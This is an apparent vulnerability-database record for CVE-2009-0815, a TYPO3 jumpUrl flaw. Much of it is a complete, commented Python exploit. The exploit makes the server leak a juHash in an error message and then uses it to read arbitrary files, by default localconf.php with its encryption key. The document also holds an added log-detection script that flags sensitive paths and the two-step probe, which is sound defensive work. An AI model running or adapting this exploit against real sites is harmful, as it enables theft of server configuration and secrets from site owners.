TYPO3 class.tslib_fe.php jumpUrl Mechanism Information Disclosure Vulnerability

Vulnerability ID: 1117382
Vulnerability type: Information disclosure
Published: 2009-02-10
Updated: 2009-03-05
CVE ID: CVE-2009-0815
CNNVD ID: CNNVD-200903-096
Platform: PHP
CVSS score: 5.0
|Vulnerability sources
https://www.exploit-db.com/exploits/8038
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-096
|Vulnerability details
TYPO3 is a free CMS framework developed by the TYPO3.org project. In TYPO3 3.3.x through 3.8.x, 4.0 before 4.0.12, 4.1 before 4.1.10, 4.2 before 4.2.6, and 4.3alpha1, the jumpUrl mechanism in class.tslib_fe.php does not omit the hash secret (juHash) from its error messages. A remote attacker can read arbitrary files by including the disclosed hash in a subsequent request.
|Exploit (EXP)
#!/usr/bin/env python
#
# ------------------------------------------------------------------------------
# TYPO3-SA-2009-002 exploit by Lolek of TK53 <lolek1337 _at_ gmail.com>
# date: 2009/02/10
# vendor url: http://typo3.org
# vulnerable versions: TYPO3 < 4.2.6, TYPO3 < 4.1.10, TYPO3 < 4.0.12
# usage:
#       typo3-sa-2009-002.py <host> <file> (defaults to typo3conf/localconf.php)
#
# if people fixed their installations but did not update the typo3 security key
# you should be able to precompute the hashes if you previously got the security key.
#
# greetings to milw0rm, roflek

import urllib,re,sys

# the juSecure error message embeds the hash the server calculated; capture it
strip = re.compile(r'.*Calculated juHash, ([a-z0-9]+), did not.*')

def useme():
    print sys.argv[0], '<host> (with http://) <file> (defaults to typo3conf/localconf.php)'
    sys.exit(0)

def parsehash(host, f):
    # request the file with juSecure set but no juHash, so the server answers
    # with the error message that contains the calculated hash
    file = urllib.urlencode({'jumpurl' : f, 'type' : 0, 'juSecure': 1, 'locationData' : '1:'})
    url = host + '/index.php?' + file
    try:
        s = urllib.urlopen(url)
        r = s.read()
    except Exception, e:
        print '[!] - ', str(e)
        return None

    tmp = strip.match(r)
    if tmp:
        return tmp.group(1)
    else:
        return None

def content(host, hash, f):
    # repeat the same request with the leaked hash; the server now serves the file
    file = urllib.urlencode({'jumpurl' : f, 'type' : 0, 'juSecure': 1, 'locationData' : '1:', 'juHash' : hash})
    url = host + '/index.php?' + file
    try:
        s = urllib.urlopen(url)
        print '[+] - content of:', f
        print s.read()
    except:
        print '[!] - FAIL'

def main():
    if len(sys.argv) < 2:
        useme()

    # default target file is the TYPO3 configuration (contains the encryption key)
    if len(sys.argv) < 3:
        file = 'typo3conf/localconf.php'
    else:
        file = sys.argv[2]

    print '[+] - TYPO3-SA-2009-002 exploit by Lolek of TK53'
    print '[+] - checking typo3 installation on...'

    hash = parsehash(sys.argv[1], file)

    if not hash:
        print '[!] - version already fixed or 42 went wrong while trying to get the hash'
        sys.exit(234)

    content(sys.argv[1], hash, file)


if __name__ == '__main__':
    main()

# milw0rm.com [2009-02-10]
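An added detection example, not part of the original record or of the exploit above: it scans Apache-style access-log lines for juSecure jumpUrl requests that reach typo3conf/ or traverse directories, and for the exploit's two-step shape (a hash-less request that provokes the leaking error, then the same client re-requesting the same file with a juHash). The log lines, client addresses and hash values are constructed samples; the sensitive-path list and the five-minute window are assumptions to tune per site.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (Combined Log Format); IPs and hashes are made up.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Feb/2009:14:02:11 +0000] "GET /index.php?jumpurl=typo3conf%2Flocalconf.php&type=0&juSecure=1&locationData=1%3A HTTP/1.1" 200 512 "-" "Python-urllib/1.17"
203.0.113.5 - - [10/Feb/2009:14:02:12 +0000] "GET /index.php?jumpurl=typo3conf%2Flocalconf.php&type=0&juSecure=1&locationData=1%3A&juHash=0123456789abcdef HTTP/1.1" 200 4096 "-" "Python-urllib/1.17"
198.51.100.9 - - [10/Feb/2009:14:05:30 +0000] "GET /index.php?id=12&jumpurl=fileadmin%2Fbrochure.pdf&juSecure=1&locationData=12%3A&juHash=fedcba9876543210 HTTP/1.1" 200 88000 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Feb/2009:14:06:00 +0000] "GET /index.php?id=12 HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*"')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
SENSITIVE_PREFIXES = ("typo3conf/", "typo3/")   # assumed: jumpUrl should only serve public files
PROBE_WINDOW = timedelta(minutes=5)             # assumed: how soon a hashed retry counts as follow-up

def parse_line(line):
    # Extract client, timestamp and the jumpUrl-related query fields; None if the line is not a request.
    m = LOG_RE.match(line)
    if not m:
        return None
    q = parse_qs(urlsplit(m["target"]).query)
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], TS_FMT),
        "jumpurl": q.get("jumpurl", [None])[0],
        "secure": q.get("juSecure", ["0"])[0] == "1",
        "has_hash": "juHash" in q,
    }

def detect(log_text):
    """Return (rule, ip, jumpurl) alerts for juSecure traffic matching the CVE-2009-0815 pattern."""
    alerts = []
    probes = {}  # (ip, jumpurl) -> time of the last juSecure request sent without a juHash
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec or not rec["secure"] or not rec["jumpurl"]:
            continue
        key = (rec["ip"], rec["jumpurl"])
        path = rec["jumpurl"].lstrip("/")
        # Rule 1: a secure jumpUrl request for a config/system path or with traversal is never legitimate.
        if ".." in path or path.startswith(SENSITIVE_PREFIXES):
            alerts.append(("sensitive_path", rec["ip"], rec["jumpurl"]))
        # Rule 2: hash-less request, then the same client re-requesting the same file with a juHash.
        if not rec["has_hash"]:
            probes[key] = rec["ts"]
        elif key in probes and rec["ts"] - probes[key] <= PROBE_WINDOW:
            alerts.append(("probe_then_fetch", rec["ip"], rec["jumpurl"]))
    return alerts
```

Rule 2 also fires on patched installations that still return a generic error, which is useful: it shows someone trying the technique even when the hash no longer leaks.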
|References

Source: DEBIAN
Name: DSA-1720
Link: http://www.debian.org/security/2009/dsa-1720
Source: typo3.org
Link: http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-002/
Source: MLIST
Name: [oss-security] 20090210 CVE request: typo3 xss (typo3-sa-2009-002)
Link: http://www.openwall.com/lists/oss-security/2009/02/10/6